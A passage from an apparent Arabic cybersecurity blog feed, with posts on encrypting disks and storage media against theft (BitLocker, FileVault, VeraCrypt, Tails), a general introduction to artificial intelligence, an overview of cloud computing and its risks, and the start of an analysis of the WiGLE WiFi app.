&lt;h2 id=&quot;ما-الذي-يمكن-القيام-به-لحماية-الملفات-والمعلومات-الموجودة-على-جهاز-الكمبيوتر-في-حال-سرقته-أو-ضياعه&quot;&gt;ما الذي يمكن القيام به لحماية الملفات والمعلومات الموجودة على جهاز الكمبيوتر في حال سرقته أو ضياعه؟&lt;/h2&gt;
&lt;p&gt;يوجد عدة خيارات يمكن اللجوء إليها والتي تحول دون الوصول غير المصرح به إلى بيانات ومحتويات الجهاز في حال سرقته أو ضياعه.&lt;/p&gt;
&lt;h3 id=&quot;الخيار-الأول-تشفير-القرص-الصلب&quot;&gt;الخيار الأول: تشفير القرص الصلب&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;يؤدي تشفير القرص الصلب إلى:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;منع إلغاء (أو تخطي) كلمة السر الخاصة بالجهاز.&lt;/li&gt;
&lt;li&gt;إعاقة الوصول إلى البيانات و الملفات الموجودة على القرص الصلب أو نظام التشغيل – الأمور المذكورة في “الحالة الأولى: عدم وجود كلمة سر لنظام التشغيل”.&lt;/li&gt;
&lt;li&gt;عدم القدرة على استعادة الملفات المحذوفة من الجهاز.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;يمكن تشفير نظام التشغيل أو القرص الصلب بعدة طرق، منها:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;برنامج &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-overview&quot;&gt;بت لوكر BitLocker&lt;/a&gt; – ﻷنظمة تشغيل ويندوز.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;هو برنامج مدمج مع نظام التشغيل ويندوز Windows، يتيح تشفير الأقراص داخل النظام، لكنه متوفر في اصدارات محددة فقط من ويندوز هي: Pro و Enterprise و Education.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;برنامج &lt;a href=&quot;https://support.apple.com/ar-eg/HT204837&quot;&gt;FileVault&lt;/a&gt; – لأجهزة ماك Mac.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;هو برنامج مدمج مع نظام تشغيل ماك Mac، يتيح تشفير نظام التشغيل أو القرص الصلب وهو متوفر في جميع إصدارات نظام التشغيل ماك Mac.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;برنامج &lt;a href=&quot;https://www.veracrypt.fr/en/Downloads.html&quot;&gt;VeraCrypt&lt;/a&gt; – لجميع أنظمة التشغيل (ويندوز، ماك، لينكس)&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;هو برنامج مستقل يتيح تشفير القرص الصلب، ويمكن تثبيته على أنظمة التشغيل ويندوز أو ماك أو لينكس.&lt;/p&gt;
&lt;p&gt;كما يمكن استخدام فيرا كريبت في أجهزة ويندوز كبديل عن بت لوكر BitLocker في الأجهزة التي لا تدعمه.&lt;/p&gt;
&lt;h3 id=&quot;الخيار-الثاني-تشفير-الملفات-والمجلدات-داخل-الجهاز&quot;&gt;الخيار الثاني: تشفير الملفات والمجلدات داخل الجهاز&lt;/h3&gt;
&lt;p&gt;في حال عدم القدرة أو عدم الرغبة في تشفير كامل القرص الصلب، يمكن اللجوء إلى تشفير مجلدات أو ملفات محددة&lt;/p&gt;
&lt;p&gt;في حال وصول جهة ما إلى ملفات الجهاز أو نظام التشغيل لا يمكنها الإطلاع على محتوى الملفات المشفرة.&lt;/p&gt;
&lt;p&gt;يمكن تشفير الملفات بعدة طرق، على سبيل المثال من خلال برنامج &lt;strong&gt;فيرا كريبت VeraCrypt&lt;/strong&gt;، حيث يتيح إمكانية إنشاء &lt;strong&gt;Container&lt;/strong&gt; أو مجلد مشفر، يمكن وضع الملفات المراد حمايتها داخله ويتم تشفيرها بشكل تلقائي.&lt;/p&gt;
&lt;h3 id=&quot;الخيار-الثالث-استخدام-نظام-تشغيل-من-نوع-live-system&quot;&gt;الخيار الثالث: استخدام نظام تشغيل من نوع Live System&lt;/h3&gt;
&lt;p&gt;تتيح بعض أنظمة التشغيل الحذف التلقائي لجميع الملفات والمعلومات عند إطفاء أو إعادة تشغيل النظام.&lt;/p&gt;
&lt;p&gt;يوجد عدة أنظمة تشغيل تتيح هذا الخيار و منها نظام تشغيل &lt;strong&gt;&lt;a href=&quot;https://tails.boum.org/&quot;&gt;Tails&lt;/a&gt;&lt;/strong&gt; وهو نظام تشغيل يركّز على الخصوصية والأمان، كما أنه مزوّد بنظام مدمج يعمل على تشفير كافة اتصالات الإنترنت الصادرة والواردة من الجهاز معتمدة على شبكة Tor.&lt;/p&gt;
&lt;p&gt;يمكن تثبيت نظام Tails على أي جهاز حاسب أو الإقلاع من خلال USB بشكل مباشر، كما يمكن استخدامه بشكل متوازي مع نظام ويندوز وماك، عند تشغيل الجهاز يتيح لك اختيار نظام التشغيل المطلوب&lt;/p&gt;
&lt;h2 id=&quot;كيف-يمكن-حماية-الملفات-الموجودة-على-وسائط-التخزين-data-storage-في-حال-سرقتها-أو-ضياعها&quot;&gt;كيف يمكن حماية الملفات الموجودة على وسائط التخزين Data storage في حال سرقتها أو ضياعها؟&lt;/h2&gt;
&lt;p&gt;كما هو الحال مع أجهزة الحاسب يمكن حماية وسائط التخزين مثل فلاش ميموري أو Memory Stick أو القرص الصلب المحمول (الخارجي) &lt;strong&gt;External Hard Drive&lt;/strong&gt; من خلال تشفير محتواها أو تشفيرها بشكل كامل وفي حال فقدانها لا يمكن الإطلاع على الملفات الموجودة بداخلها.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;يمكن تشفير الملفات أو وسائط التخزين من خلال برنامج فيرا كريبت VeraCrypt، والذي يتيح الخيارات التالية:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;إنشاء &lt;strong&gt;Container&lt;/strong&gt; أو مجلد مشفر داخل وسائط التخزين، يمكن وضع الملفات المراد حمايتها داخله.&lt;/li&gt;
&lt;li&gt;أو تشفير وسائط التخزين (Flash Memory, Memory Stick , External Hard Drive) بشكل كامل حيث لا يمكن الإطلاع على محتواها إلا من خلال كلمة السر.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;الخلاصة&quot;&gt;الخلاصة&lt;/h2&gt;
&lt;p&gt;يجب عليك الإلتزام بقواعد الحماية والسلامة الرقمية وتطبيق إجراءات الحماية الاستباقية.&lt;/p&gt;
&lt;p&gt;يمكنك الحصول على النصائح الخاصة بالأمن السيبراني والسلامة الرقمية من خلال منصة بوكيبيديا من خلال &lt;strong&gt;&lt;a href=&quot;https://bookipedia.site/course/protection-guide/&quot;&gt;دليل الحماية الشامل&lt;/a&gt;&lt;/strong&gt; في هذا الدليل الشامل سنقدم لك أكثر من مئة نصيحة حول الأمن السيبراني يمكنك من خلالها زيادة الحماية الخاصة بك على شبكة الانترنت وكل هذه النصائح هي قابلة للتطبيق، كل ما يتطلبه الأمر منك هو قضاء بعض الوقت لقراءة هذه النصائح وأخذها على محمل الجد وتطبيقها.&lt;/p&gt;
</content:encoded><category>السلامة الرقمية</category><category>تشفير القرص الصلب</category><category>VeraCrypt</category><category>BitLocker</category><category>Tails</category><category>حماية البيانات</category></item><item><title>ما هو الذكاء الاصطناعي؟</title><link>https://blog.cyberpedia.site/what-is-artificial-intelligence/</link><guid isPermaLink="true">https://blog.cyberpedia.site/what-is-artificial-intelligence/</guid><description>تعريف الذكاء الاصطناعي وسبب أهميته، مع أمثلة على تطبيقاته اليومية في التسوق والبحث والمدن الذكية والأمن السيبراني والصحة، ومكانته في سوق العمل.</description><pubDate>Sun, 18 Sep 2022 17:37:12 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;الذكاء الاصطناعي هو قدرة الآلة على عرض قدرات شبيهة بالإنسان مثل التفكير والتعلم والتخطيط والإبداع، فيمكّن الأنظمة من إدراك بيئتها وحل المشكلات لتحقيق هدف محدد. يدخل اليوم في المساعدين الافتراضيين ومحركات البحث والتعرف على الوجه والسيارات ذاتية القيادة، ويساعد في كشف الهجمات الإلكترونية وتحليل البيانات الصحية.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;الذكاء الاصطناعي هو قدرة الآلة على عرض قدرات شبيهة بالإنسان مثل التفكير والتعلم والتخطيط والإبداع&lt;/p&gt;
&lt;p&gt;يمكّن الذكاء الاصطناعي الأنظمة التقنية من إدراك بيئتها والتعامل معها لحل المشاكل والعمل لتحقيق هدف محدد&lt;/p&gt;
&lt;p&gt;كما يمكن تعريف &lt;strong&gt;الذكاء الاصطناعي&lt;/strong&gt; على أنه سلوك وخصائص معينة تتسم بها البرامج الحاسوبية وتجعلها تحاكي القدرات الذهنية البشرية وأنماط عملها، من أهم هذه الخصائص القدرة على التعلم والاستنتاج ورد الفعل على أوضاع لم تبرمج مسبقاً&lt;/p&gt;
&lt;p&gt;تعتبر أنظمة الذكاء الاصطناعي قادرة على تكييف سلوكها إلى درجة معينة من خلال تحليل تأثيرات الإجراءات السابقة والعمل بشكل مستقل.&lt;/p&gt;
&lt;h2 id=&quot;لماذا-يعتبر-الذكاء-الاصطناعي-مهماً&quot;&gt;لماذا يعتبر الذكاء الاصطناعي مهماً؟&lt;/h2&gt;
&lt;p&gt;هناك العديد من قصص النجاح التي تثبت قيمة الذكاء الاصطناعي، العديد من الشركات التي تضيف الذكاء الاصطناعي (التعلم الآلي والتفاعل الإدراكي) إلى عمليات الأعمال التقليدية والتطبيقات يمكنها أن تحسّن بشدة من تجربة المستخدم وتعزز من الإنتاجية&lt;/p&gt;
&lt;p&gt;يُنظر إلى الذكاء الاصطناعي على أنه عنصر أساسي في التحول الرقمي للمجتمع وقد أصبح من أولويات العديد من الدول كما أنه من المتوقع أن تحدث التطبيقات المستقبلية تغييرات هائلة، لكن الذكاء الاصطناعي موجود بالفعل في حياتنا اليومية، إليك بعض الأمثلة:&lt;/p&gt;
&lt;h2 id=&quot;أنواع-الذكاء-الاصطناعي&quot;&gt;أنواع الذكاء الاصطناعي&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;البرمجيات&lt;/li&gt;
&lt;li&gt;المساعدين الافتراضيين&lt;/li&gt;
&lt;li&gt;برامج تحليل الصور&lt;/li&gt;
&lt;li&gt;محركات البحث&lt;/li&gt;
&lt;li&gt;أنظمة التعرف على الكلام والوجه&lt;/li&gt;
&lt;li&gt;الروبوتات&lt;/li&gt;
&lt;li&gt;السيارات ذاتية القيادة&lt;/li&gt;
&lt;li&gt;الطائرات بدون طيار&lt;/li&gt;
&lt;li&gt;إنترنت الأشياء&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;فيما يلي بعض تطبيقات الذكاء الاصطناعي التي قد لا تدرك أنها مدعومة بالذكاء الاصطناعي:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;التسوق والإعلان عبر الإنترنت&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;يستخدم الذكاء الاصطناعي على نطاق واسع لتقديم توصيات مخصصة للأشخاص، على سبيل المثال: الاعتماد على عمليات البحث والمشتريات السابقة أو أي سلوك آخر عبر الإنترنت، هذا الأسلوب مستخدم من قبل الشركات لاستهداف الأشخاص بإعلانات موجهة&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;البحث في الويب&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;تتعلم محركات البحث من المدخلات الهائلة للبيانات التي يقدمها المستخدمون لتقديم نتائج البحث ذات الصلة.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;المنازل والمدن والبنية التحتية الذكية&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;يأمل مطورو المدن الذكية في تنظيم حركة المرور لتحسين الاتصال بين المدن وتقليل الاختناقات المرورية.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;الأمن السيبراني&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;يمكن أن تساعد أنظمة الذكاء الاصطناعي في التعرف على الهجمات والتهديدات الإلكترونية والتخفيف منها بالاعتماد على مراقبة حركة البيانات والسلوك والتعرف على أنماط الهجمات وتعقبها.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;الصحة&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;يدرس الباحثون كيفية استخدام الذكاء الاصطناعي لتحليل كميات كبيرة من البيانات الصحية واكتشاف الأنماط التي يمكن أن تؤدي إلى اكتشافات جديدة في الطب وطرق تحسين التشخيص الفردي.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;على سبيل المثال:&lt;/strong&gt; طور الباحثون برنامجاً للذكاء الاصطناعي للرد على مكالمات الطوارئ التي تعد بالتعرف على السكتة القلبية أثناء المكالمة بشكل أسرع وأكثر تكراراً من المراسلين الطبيين.&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;من المتوقع أن يتصدر الذكاء الاصطناعي والتعلم الآلي قوائم أهم المهارات في سوق العمل في أواخر عام 2026.&lt;/p&gt;
&lt;p&gt;من المتوقع أيضاً أن تزداد الوظائف التي تتطلب مهارات الذكاء الاصطناعي أو التعلم الآلي بنسبة 71٪ في السنوات الخمس المقبلة إذا كنت ترغب في توسيع قاعدتك المعرفية في هذا المجال ففكر في بعض عروض الدورات التدريبية المجانية الرائعة عبر الإنترنت التي تركز على مهارات الذكاء الاصطناعي.&lt;/p&gt;
</content:encoded><category>الذكاء الاصطناعي والتقنية</category><category>الذكاء الاصطناعي</category><category>التعلم الآلي</category><category>تطبيقات الذكاء الاصطناعي</category><category>الأمن السيبراني</category></item><item><title>ما هي الحوسبة السحابية؟</title><link>https://blog.cyberpedia.site/cloud-computing/</link><guid isPermaLink="true">https://blog.cyberpedia.site/cloud-computing/</guid><description>شرح الحوسبة السحابية وفوائدها للشركات والأفراد، ومقارنة بين أبرز مزوديها AWS وAzure وGoogle Cloud، ومساوئها مثل تسرب البيانات وهجمات منع الخدمة.</description><pubDate>Sat, 17 Sep 2022 21:11:43 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;الحوسبة السحابية طريقة لتخزين البيانات والوصول إليها وإلى البرامج والموارد من أي مكان عبر الإنترنت. من فوائدها خفض التكاليف وقابلية التوسع واستمرارية الأعمال والنسخ الاحتياطي الآلي، وأبرز مزوديها AWS وMicrosoft Azure وGoogle Cloud. أما مساوئها فتشمل الاعتماد الدائم على الإنترنت، وصعوبة الاسترداد، وفقدان البيانات أو تسربها، وهجمات منع الخدمة.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;الحوسبة السحابية هي طريقة لتخزين البيانات والوصول إليها من أي مكان في العالم كما تسمح لنا بالوصول للبرامج والأجهزة والموارد الأخرى من أي مكان في العالم.&lt;/p&gt;
&lt;p&gt;تتيح الحوسبة السحابية للأشخاص مشاركة المعلومات مع بعضهم البعض من خلال أجهزتهم، كما تتيح أيضاً للأشخاص تخزين بياناتهم عبر مواقع الإنترنت ويمكنهم بعدها الوصول إليها من أي جهاز.&lt;/p&gt;
&lt;p&gt;تتمتع الحوسبة السحابية بالعديد من الميزات لكل من الأفراد والشركات، تتمثل إحدى مزايا الشركات بأنها تستطيع إدارة بياناتها بكفاءة أكبر وتوفير المال بدل شراء الأجهزة باهظة الثمن مثل السيرفرات التي تعد مطلوبة للتخزين في الموقع.&lt;/p&gt;
&lt;h2 id=&quot;فوائد-الحوسبة-السحابية-للشركات-والأفراد&quot;&gt;فوائد الحوسبة السحابية للشركات والأفراد&lt;/h2&gt;
&lt;p&gt;تقدم الحوسبة السحابية مزايا متنوعة للشركات مثل قابلية التوسع والمرونة والفعالية من حيث التكلفة والموثوقية ومع ذلك، فإن هذه الفوائد تأتي بتكلفة لا تأخذها الشركة في الاعتبار في كثير من الأحيان، تعد الحماية و الأمان أحد أكبر اهتمامات المؤسسات وخدمات الحوسبة السحابية.&lt;/p&gt;
&lt;h2 id=&quot;أبرز-الفوائد&quot;&gt;أبرز الفوائد&lt;/h2&gt;
&lt;h3 id=&quot;انخفاض-التكاليف&quot;&gt;انخفاض التكاليف&lt;/h3&gt;
&lt;p&gt;قد يؤدي الانتقال إلى الحوسبة السحابية إلى تقليل تكلفة إدارة أنظمة تكنولوجيا المعلومات وصيانتها، بدلاً من شراء أنظمة ومعدات باهظة الثمن لعملك، يمكنك تقليل تكاليفك باستخدام موارد مزود خدمة الحوسبة السحابية&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;قد تتمكن من تقليل تكاليف التشغيل للأسباب التالية:&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;يتم تضمين تكلفة ترقيات النظام والأجهزة والبرامج الجديدة في العقد الخاص بك&lt;/li&gt;
&lt;li&gt;لم تعد بحاجة إلى دفع أجور الموظفين و الخبراء لتشغيل أنظمتك&lt;/li&gt;
&lt;li&gt;يتم تقليل تكاليف استهلاك الطاقة الخاصة بك&lt;/li&gt;
&lt;li&gt;هناك عدد أقل من التأخيرات الزمنية.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id=&quot;قابلية-التوسع&quot;&gt;قابلية التوسع&lt;/h3&gt;
&lt;p&gt;يمكن لشركتك توسيع نطاق احتياجات التشغيل والتخزين لديك أو تصغيرها بسرعة لتناسب وضعك، مما يتيح المرونة مع تغير احتياجاتك وبدلاً من شراء ترقيات باهظة الثمن وتثبيتها بنفسك، يمكن لمزود خدمة الحوسبة السحابية التعامل مع هذا الأمر نيابةً عنك&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;يوفر استخدام الحوسبة السحابية وقتك حتى تتمكن من متابعة إدارة عملك الأخرى&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id=&quot;استمرارية-الأعمال&quot;&gt;استمرارية الأعمال&lt;/h3&gt;
&lt;p&gt;تعد حماية بياناتك وأنظمتك جزء مهم من التخطيط لاستمرارية الأعمال. سواء كنت تواجه كارثة طبيعية أو انقطاع التيار الكهربائي أو أزمة أخرى فإن تخزين بياناتك في السحابة يضمن نسخها احتياطياً وحمايتها في مكان آمن وهذا الأمر يتيح لك القدرة على الوصول إلى بياناتك مرة أخرى بسرعة لمتابعة الأعمال كالمعتاد وهذا يساعد على التقليل من أي توقف أو فقدان للإنتاجية.&lt;/p&gt;
&lt;h3 id=&quot;نسخ-احتياطي--استعادة-للملفات-والبيانات-بشكل-آلي&quot;&gt;نسخ احتياطي / استعادة للملفات والبيانات بشكل آلي&lt;/h3&gt;
&lt;p&gt;النسخ الاحتياطي السحابي هو خدمة يتم فيها نسخ البيانات والتطبيقات الموجودة على خوادم الأعمال احتياطياً وتخزينها على خادم بعيد&lt;/p&gt;
&lt;p&gt;تختار الشركات النسخ الاحتياطي إلى السحابة للاحتفاظ بالملفات والبيانات المتاحة بسهولة في حالة فشل النظام أو انقطاع التيار أو حدوث كارثة طبيعية.&lt;/p&gt;
&lt;p&gt;يمكن للمستخدمين أيضاً القيام بذلك على الخوادم الخاصة للشركات التي تقدم هذه الخدمة&lt;/p&gt;
&lt;h2 id=&quot;أفضل-مزودي-خدمة-الحوسبة-السحابية&quot;&gt;أفضل مزودي خدمة الحوسبة السحابية&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;تتمثل إحدى الصعوبات في إدراج أفضل الشركات السحابية في الإجابة عن السؤال التالي:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;أفضل الشركات السحابية من أجل ماذا؟&lt;/p&gt;
&lt;p&gt;هناك العديد من الاستخدامات المؤسسية المتكاملة بشكل أساسي للسحابة في عام 2022، من الوصول إلى برامج الموارد البشرية إلى استضافة البنية التحتية للأنظمة الخاصة بك، لذلك سوف نقوم بالإجابة على هذا السؤال من الناحية العامة وذكر أسماء موفري الخدمة في جميع التي تلبي المتطلبات السابقة&lt;/p&gt;
&lt;h3 id=&quot;aws&quot;&gt;&lt;a href=&quot;https://aws.amazon.com/ar/&quot;&gt;AWS&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;تمتد خدمات Amazon Web Services AWS لتشمل 87 من مناطق توافر الخدمات في 27 منطقةً جغرافيةً حول العالم، مع وجود خطط مُعلنة لتغطية 21 من مناطق توافر الخدمات الأخرى و7 مناطق أخرى في أستراليا وكندا والهند والأراضي المحتلة في فلسطين ونيوزيلندا وإسبانيا وسويسرا.&lt;/p&gt;
&lt;p&gt;وتتفوق AWS على كل الجهات الأخرى المقدمة للخدمات السحابية من حيث توفير المزيد من الخدمات والمزيد من المزايا بما في ذلك خدمات الحوسبة والتخزين وقواعد البيانات والاتصال عبر الشبكات ومخازن البيانات وتحليلاتها وتقنية تعلم الآلة والذكاء الاصطناعي وإنترنت الأشياء (IoT) والحماية والأمان والمزيد غير ذلك.&lt;/p&gt;
&lt;p&gt;كما أنها تعتبر رقم واحد من حيث سرعة الإستجابة في برنامج خدمة العملاء.&lt;/p&gt;
&lt;h3 id=&quot;microsoft-azure&quot;&gt;&lt;a href=&quot;https://azure.microsoft.com/en-us/free/search/?&amp;amp;ef_id=CjwKCAjw4JWZBhApEiwAtJUN0NXxXguFxb-TZJbbEJIZZHLVRjeY2ooV4RNA-v1jgssiHyHPwkqcdRoC-70QAvD_BwE:G:s&amp;amp;OCID=AIDcmm5edswduu_SEM_CjwKCAjw4JWZBhApEiwAtJUN0NXxXguFxb-TZJbbEJIZZHLVRjeY2ooV4RNA-v1jgssiHyHPwkqcdRoC-70QAvD_BwE:G:s&amp;amp;gclid=CjwKCAjw4JWZBhApEiwAtJUN0NXxXguFxb-TZJbbEJIZZHLVRjeY2ooV4RNA-v1jgssiHyHPwkqcdRoC-70QAvD_BwE&quot;&gt;Microsoft Azure&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;يحتل Azure من Microsoft المرتبة الثانية من حيث الإيرادات، لكن Azure هو في الأساس منافس مباشر مع الذئب الكبير Amazon Web Services. وتكمن قوته من الهيمنة الطويلة لنظام التشغيل Windows والعديد من تطبيقات شركة Microsoft الأخرى&lt;/p&gt;
&lt;p&gt;تتمتع Azure بموقع جيد لخدمة عملاء السحابة حيث أصبحت الأتمتة والذكاء الاصطناعي مهيمنين حيث تعتبر Azure MachineLearning منصة كاملة الميزات تتيح إنشاء جميع أنواع الخوارزميات المخصصة وحلول تعلم الآلة.&lt;/p&gt;
&lt;h3 id=&quot;google-cloud&quot;&gt;&lt;a href=&quot;https://www.googleadservices.com/pagead/aclk?sa=L&amp;amp;ai=DChcSEwii0YHU2Zz6AhWKyZQJHegOAiQYABAAGgJ5bQ&amp;amp;ohost=www.google.com&amp;amp;cid=CAESa-D2BUwnXfSqS9cUJ9u4b1xZ_Dd2S7KjgmLZ_QEUUECpNScBxAdpTCOvCKBrjJ2ECKE9nheSaquPaqI73GwtTsQ-n8uDN8rvDVm13eIxd2K4Yc-zNMYid8V0KnDSyXxziFaN32IttOYVcL8u&amp;amp;sig=AOD64_3eMpUrstKrhEHkqgp-u55qprU5hA&amp;amp;q&amp;amp;adurl&amp;amp;ved=2ahUKEwjl0vfT2Zz6AhW6rYkEHae4CHoQ0Qx6BAgGEAE&amp;amp;nis=8&quot;&gt;Google Cloud&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;تحتل منصة جوجل السحابية (GCP) المركز الثالث خلف AWS و Microsoft Azure، وتمتاز بتقديم &lt;em&gt;Infrastructure as a service&lt;/em&gt; – IaaS البنية التحتية كخدمة قوية تقنيات عميقة من الهيمنة في سوق البحث.&lt;/p&gt;
&lt;p&gt;بدءاً من القوة في الشبكات والأتمتة يقدم برنامج شركاء جوجل المعتمدون Google Certified Partner أعظم قوة في مجال الذكاء الاصطناعي والتعلم الآلي وعلى وجه الخصوص تحليل البيانات&lt;/p&gt;
&lt;p&gt;تاريخياً، لم يكن هذا البرنامج متوافق بشكل جيد مع عملاء المؤسسات وهو وضع تعمل الشركة على تصحيحه.&lt;/p&gt;
&lt;h2 id=&quot;مساوئ-الحوسبة-السحابية&quot;&gt;مساوئ الحوسبة السحابية&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;رغم تلك الفوائد أعلاه لكن للحوسبة السحابية مساوئ فما هي؟&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id=&quot;تعتمد-على-الاتصال-بالإنترنت-في-جميع-الأوقات&quot;&gt;تعتمد على الاتصال بالإنترنت في جميع الأوقات&lt;/h3&gt;
&lt;p&gt;بينما ينتج معظم موفري الاتصال وقت تشغيل بنسبة 99.99٪ لكي لا ينقطع الاتصال بالانترنت ولكن هناك دائماً احتمال حدوث كارثة طبيعية أو مشكلة في الفواتير أو خط متقطع بسبب البناء المحلي أو نشاط مشابه أو انقطاعات بسبب مشاكل أخرى&lt;/p&gt;
&lt;h3 id=&quot;الملفات-سهلة-التخزين-ولكنها-ليست-سهلة-الاسترداد-والتنزيل&quot;&gt;الملفات سهلة التخزين ولكنها ليست سهلة الاسترداد والتنزيل&lt;/h3&gt;
&lt;p&gt;عند العمل مع الملفات والصور ومقاطع الفيديو وسجلات البيانات والمعلومات الأخرى المخزنة في السحابة، تأكد من فهمك لقواعد وقيود الدخول والخروج. تحتوي عناصر التحكم في خدمة VPC – &lt;em&gt;Virtual Private Cloud&lt;/em&gt; على عدد من قواعد الدخول والخروج للسماح بالوصول إلى الموارد والعملاء المحمية بواسطة محيط الخدمة وإليها&lt;/p&gt;
&lt;p&gt;على سبيل المثال، قواعد الدخول والخروج من تخزين Google Cloud Platform شاملة إلى حد ما وتشرح قائمة طويلة من الموضوعات الفرعية، بما في ذلك نماذج السياسة وأمثلة طلبات واجهة برمجة التطبيقات وغير ذلك.&lt;/p&gt;
&lt;p&gt;وبالمثل، فإن Amazon Web Services لديها مجموعة قواعد VPC الخاصة بها، كما هو الحال مع Microsoft Azure. و قد يؤدي عدم فهم هذه القواعد إلى ضياع الوقت والجهد للمستخدم أو الشركة.&lt;/p&gt;
&lt;h3 id=&quot;فقدان-البيانات-أو-السرقة-وتسرب-البيانات&quot;&gt;فقدان البيانات أو السرقة وتسرب البيانات&lt;/h3&gt;
&lt;p&gt;عندما تقوم بتخزين الملفات والبيانات في خادم شخص آخر، فإنك تضع كل ثقتك بهذه الجهة، يشير مصطلح فقدان البيانات إلى الإزالة غير المرغوب فيها للمعلومات الحساسة، إما بسبب خطأ في نظام المعلومات أو السرقة من قبل مجرمي الإنترنت.&lt;/p&gt;
&lt;p&gt;بينما يشير المصطلح تسرب البيانات إلى العرض أو الكشف الغير مصرح به لمعلومات حساسة من خلال استغلال نقاط الضعف في الأنظمة والشبكات&lt;/p&gt;
&lt;p&gt;تحدث تهديدات تسرب البيانات عادةً عبر الويب والبريد الإلكتروني، ولكن يمكن أن تحدث أيضاً عبر أجهزة تخزين البيانات المحمولة، مثل مفاتيح USB وأجهزة الكمبيوتر المحمولة وربما السحابة أيضاً!&lt;/p&gt;
&lt;h3 id=&quot;هجمات-منع-الخدمة-dos&quot;&gt;هجمات منع الخدمة DOS&lt;/h3&gt;
&lt;p&gt;(DoS) هو هجوم يهدف إلى إغراق الشبكة أو النظام الهدف بعدد كبير جداً من الطلبات مما يجعل الوصول إليها غير ممكن من قبل المستخدم الشرعي ويتم هذا الأمر من خلال إغراق الهدف بكمية كبيرة من حركة البيانات أو إرسال معلومات تؤدي إلى حدوث عطل ما&lt;/p&gt;
&lt;p&gt;مستخدمو الخدمة السحابية لديهم سيطرة قليلة أو معدومة ضد هجمات منع الخدمة&lt;/p&gt;
</content:encoded><category>الأمن السيبراني</category><category>الحوسبة السحابية</category><category>AWS</category><category>Microsoft Azure</category><category>Google Cloud</category><category>أمن السحابة</category></item><item><title>تحليل التطبيق الذي حذرت منه الهيئة الوطنية لخدمات الشبكة</title><link>https://blog.cyberpedia.site/wigle-wifi/</link><guid isPermaLink="true">https://blog.cyberpedia.site/wigle-wifi/</guid><description>تحليل أولي لتطبيق WiGLE WiFi Wardriving الذي حذرت منه الهيئة الوطنية لخدمات الشبكة: معنى Wardriving وصلاحيات التطبيق والبيانات التي يرسلها.</description><pubDate>Fri, 09 Sep 2022 21:55:16 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;حذرت الهيئة الوطنية لخدمات الشبكة في سوريا من تطبيق WiGLE WiFi Wardriving لأنه يجمع معلومات الشبكات اللاسلكية ومواقعها الجغرافية. يطلب التطبيق صلاحية الموقع وصلاحية الصور والملفات التي قد تُعد سلوكاً خبيثاً، ويرصد الشبكات وأبراج الاتصالات ثم يرسل البيانات مشفرة عبر HTTPS إلى خادم تابع لغوغل.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;حذرت الهيئة الوطنية لخدمات الشبكة عبر &lt;a href=&quot;https://www.facebook.com/nans.arabic&quot;&gt;صفحتها على الفيسبوك&lt;/a&gt; من تطبيق WiGLE WiFi Wardriving وكان نص المنشور كالتالي:&lt;/p&gt;
&lt;p&gt;تحذر الهيئة الوطنية لخدمات الشبكة جميع المواطنين السوريين من استخدام تطبيق WIGLE WIFI على هواتفهم المحمولة المستخدمة ضمن أراضي الجمهورية العربية السورية، حيث تكمن خطورة التطبيق في جمع معلومات عن كافة الإشارات اللاسلكية الشبكية ومواقعها الجغرافية، والمنشآت التي تستخدم هذه الإشارات اللاسلكية، كما يشكل التطبيق أداة اختراق للهواتف المحمولة والشبكات اللاسلكية المتصلة بها.&lt;/p&gt;
